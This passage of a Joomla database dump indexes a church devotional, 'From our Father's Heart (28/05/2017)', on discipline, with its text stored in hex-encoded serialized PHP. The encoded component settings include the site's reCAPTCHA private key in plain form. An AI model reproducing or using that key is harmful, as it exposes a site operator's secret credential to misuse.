733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223138223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33363a2234363a66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35343a22636f6d706f6e656e742f6b322f6974656d2f34362d66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3436223b733a353a22726f757465223b733a37333a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34363a66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a353a227469746c65223b733a33353a2246726f6d206f75722046617468657227732048656172742028372f30352f3230313729223b733a31313a226465736372697074696f6e223b733a3435313a2220446561726c792042656c6f7665642c204c69766520557020546f20596f75722043616c6c696e672120526169736520796f7572206c69666520746f20746865206c6576656c206f6620796f75722063616c6c696e672e20446f6e277420636f6e74696e7565206c6976696e6720617420746865206c6576656c206f6620796f757220636f6e76656e69656e63652e204a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f642773206d616e64617465206f76657220796f7572206c6966652e205768657468657220796f75206c696b65206974206f72206e6f742c207468657265206973206120646976696e652063616c6c20616e64206d616e64617465206f662068656176656e206f76657220796f7572206c696665207468617420796f75206d7573742067697665206163636f756e7420666f72207768656e20796f7520636f6d6520666163652d746f2d666163652077697468207468652046617468657220696e20657465726e69747920616e6420796f75206e65656420746f20726169736520796f7572206c69666520746f20746865206c6576656c206f66207468617420646976696e65206d616e646174652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30352d31342031363a30393a3230223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30352d31342031363a30393a3230223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(272, 'index.php?option=com_k2&view=item&id=49', 'index.php?option=com_k2&view=item&id=49:from-our-father-s-heart-28-05-2017', 'From our Father\'s Heart (28/05/2017)', ' Dearly beloved of God, Embrace discipline! To be disciplined means to receive training that corrects you, moulds you, or perfects moral character and behaviour in you. It means adjusting inside to training. It means that you have accepted discipleship (that is, a set of values) and have internalised it such that it controls and affects your decisions. ', '2017-06-25 14:19:44', '726b540cf0b0be38065953c1c51cbab2', 1, 1, 1, '*', '2017-05-28 11:18:00', '0000-00-00 00:00:00', '2017-05-28 11:18:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223439223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32382d30352d32303137223b733a373a2273756d6d617279223b733a3337303a223c703e446561726c792062656c6f766564206f6620476f642c3c2f703e0d0a3c703e456d6272616365206469736369706c696e652120546f206265206469736369706c696e6564206d65616e7320746f207265636569766520747261696e696e67207468617420636f72726563747320796f752c206d6f756c647320796f752c206f72207065726665637473206d6f72616c2063686172616374657220616e64206265686176696f757220696e20796f752e204974206d65616e732061646a757374696e6720696e7369646520746f20747261696e696e672e204974206d65616e73207468617420796f752068617665206163636570746564206469736369706c65736869702028746861742069732c206120736574206f662076616c7565732920616e64206861766520696e7465726e616c697365642069742073756368207468617420697420636f6e74726f6c7320616e64206166666563747320796f7572206465636973696f6e732e3c2f703e0d0a223b733a343a22626f6479223b733a323533323a220d0a3c703e4469736369706c696e65206973207768617420636f6e646974696f6e7320796f7572206c69666520666f7220646976696e6520626c657373696e677320746f20636f6d6520696e746f20616e642072656d61696e2074686572652e20576974686f7574206469736369706c696e652c20796f7572206c696665206265636f6d657320706f726f757320616e64206f70656e20746f20616c6c206b696e6473206f66206f70706f7274756e69737469632064656d6f6e7320746f20656e74657220796f7572206c69666520616e6420616666616972732063617573696e67206469736f7264657220616e64206368616f732e20556e6469736369706c696e656420636875726368206d656d626572732061726520746865206f6e65732077686f2061726520646966666963756c7420746f2068656c703b20746865792061726520746865206f6e6573207468617420706173746f722068616420746f207072617920666f72206f76657220616e64206f76657220616761696e2c20746865792066696e6420697420646966666963756c7420746f206f62657920696e737472756374696f6e7320616e642074686579206576656e7475616c6c79206265636f6d652076696374696d73206f66207468656972206f776e20636172656c6573736e6573732e20c2a03c2f703e0d0a3c703e496e6469736369706c696e652068696e6465727320616e67656c732066726f6d20776f726b696e672c206d616b657320646976696e6520696e74657276656e74696f6e20646966666963756c742e20496e6469736369706c696e6520776173746573207265736f75726365732c2074696d6520616e6420656e657267792e20496e6469736369706c696e652063616e207265647563652061206d616e20746f2061207069656365206f662062726561642e204469736369706c696e65206f6e20746865206f746865722068616e64206d616b657320796f75207374726f6e6765722c206d616b657320796f75206d61747572652c206d616b657320796f75207269636865722c20616e64206d616b657320796f7520726561647920666f72206c6966652773206d61747465727320616e64206973737565732e204469736369706c696e65206d616b657320796f7520636f6d706f7365642ec2a03c2f703e0d0a3c703e416e20556e6469736369706c696e6564206d616e20686173206e6f7468696e6720696e206c6966653b20737563682061206d616e206973206120646973617374657220676f696e6720736f6d65776865726520746f2068617070656e2e20546865206368696c6472656e20616e642066616d696c79206f6620616e20756e6469736369706c696e6564206d616e2077696c6c20616c77617973207375666665722070616e69632061747461636b732c207768696c65207468652066616d696c79206f662061206469736369706c696e6564206d616e2077696c6c20616c7761797320626520617420726573742e20c2a05468617427732077687920696e2074686520447265616d2043656e7472652077652074616b6520796f75207468726f756768207365766572616c2070726f6772616d6d657320696e206f7264657220746f206469736369706c696e6520796f757220626f64792c20646573697265732c20656d6f74696f6e7320616e642061707065746974657320736f207468617420796f752063616e2062652066697420666f7220476f64277320706c616e20666f7220796f7572206c69666520616e642064657374696e792ec2a03c2f703e0d0a3c703e4469736369706c696e65206272696e677320646976696e65206f7264657220696e746f20796f7572206c6966652e204469736369706c696e652069732070617274206f66207768617420697320737570706c69656420746f20796f7520617320796f7520656d62726163652073747275637475726520696e2063687572636820616e6420616c69676e20796f7572206c69666520776974682069742e2045736175206c6f737420616c6c20746861742068652068616420746f206869732062726f746865722062656361757365206f6620696e6469736369706c696e652e204865207761732074686520686569722062792062697274682c206865206861642074686520626972746872696768742062757420686520636f756c64206e6f74206469736369706c696e65206869732061707065746974657320616e6420646573697265732ec2a03c2f703e0d0a3c703e42656c6f7665642c20796f7520646f6e2774206a7573742065617420657665727920666f6f64207468617420636f6d657320796f757220776179206c696b652045736175206f72206a756d70206174206576657279206368656170206f70706f7274756e697479206f746865727769736520796f75206d69676874206861766520636f6e73756d656420796f75722064657374696e79206f7665726e696768742e204469736369706c696e6520616c736f206272696e6773206469676e6974792c207265737065637420616e6420686f6e6f757220696e746f20796f7572206c6966652e20546865206d6f737420646976696e656c79207265737065637465642070656f706c65206f6e206561727468206172652070656f706c652077686f20617265206469736369706c696e65643b2074686579206d6179206e6f74206265206c6f76656420627920616c6c20627574207468657920617265207265737065637465642e20496e6469736369706c696e65206c6561647320746f207368616d6520616e6420726570726f6163682e20416363657074696e67206469736369706c696e65206d6179206e6f74206265207468652065617369657374207468696e6720746f20646f20627574207468657265206172652067726561742062656e6566697473207768656e20796f75206163636570742069742ec2a03c2f703e0d0a3c703e54686520447265616d2043656e747265206973206120686f757365206f6620747261696e696e672c206120706c616365206f6620646976696e65206469736369706c6573686970207468617420776f726b73204b696e67646f6d206469736369706c696e6520696e746f2074686520666162726963206f6620796f757220736f756c20657370656369616c6c7920696620796f7520726573706f6e642077697468207468652072696768742068656172742e204d616b6520757020796f7572206d696e6420746f2074616b65206469736369706c696e653b20697420697320666f7220796f757220676f6f6420616e6420666f722074686520676f6f64206f6620796f75722064657374696e792ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375733c2f703e0d0a3c703e476f64277320c2a053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30362d32352031313a32353a3031223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c